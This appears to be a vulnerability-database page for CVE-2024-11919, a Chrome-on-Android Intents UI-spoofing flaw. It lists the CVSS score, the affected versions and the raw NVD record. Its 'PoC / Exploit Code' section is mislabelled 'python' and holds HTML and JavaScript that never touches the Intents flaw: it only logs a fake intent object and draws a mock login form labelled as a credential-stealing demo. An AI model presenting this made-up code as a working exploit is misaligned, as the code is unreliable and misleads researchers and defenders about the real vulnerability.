Security Vulnerability Report
中文
CVE-2024-11919 CVSS 4.3 MEDIUM

CVE-2024-11919

Published: 2025-11-14 03:15:54
Last Modified: 2025-11-17 12:25:43

Description

Inappropriate implementation in Intents in Google Chrome on Android prior to 129.0.6668.58 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome on Android < 129.0.6668.58

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2024-11919 PoC - UI Spoofing via Intents --> <!DOCTYPE html> <html> <head> <title>CVE-2024-11919 UI Spoofing PoC</title> </head> <body> <h1>UI Spoofing Test Page</h1> <p>This is a proof of concept for CVE-2024-11919</p> <script> // Malicious Intents manipulation code // This demonstrates how an attacker could exploit the Intents implementation flaw function exploitIntents() { // Create a fake intent to redirect or spoof UI const fakeIntent = { action: 'android.intent.action.VIEW', data: 'malicious://fake-site.com', flags: ['FLAG_ACTIVITY_NEW_TASK'] }; // Attempt to trigger the malicious intent // This would allow UI spoofing by manipulating Chrome's intent handling console.log('Intent exploitation attempt:', fakeIntent); // Display fake login form to demonstrate UI spoofing document.body.innerHTML = ` <div style='border: 2px solid red; padding: 20px; margin: 20px;'> <h2>⚠️ Fake Login Page (UI Spoofing Demo)</h2> <p>This is a demonstration of UI spoofing capability.</p> <form> <input type='text' placeholder='Username' style='display:block;margin:10px 0;'> <input type='password' placeholder='Password' style='display:block;margin:10px 0;'> <button type='submit'>Login</button> </form> <p style='color:red;'>⚠️ This form could be used to steal credentials!</p> </div> `; } // Execute when page loads window.onload = function() { console.log('CVE-2024-11919 PoC loaded'); setTimeout(exploitIntents, 1000); }; </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-11919", "sourceIdentifier": "[email protected]", "published": "2025-11-14T03:15:54.183", "lastModified": "2025-11-17T12:25:42.943", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inappropriate implementation in Intents in Google Chrome on Android prior to 129.0.6668.58 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "129.0.6668.58", "matchCriteriaId": "1C2C3CE1-E8FB-4A05-B400-973CE069B66C"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8B9FEC8-73B6-43B8-B24E-1F7C20D91D26"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2024/09/stable-channel-update-for-desktop_17.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/352516283", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}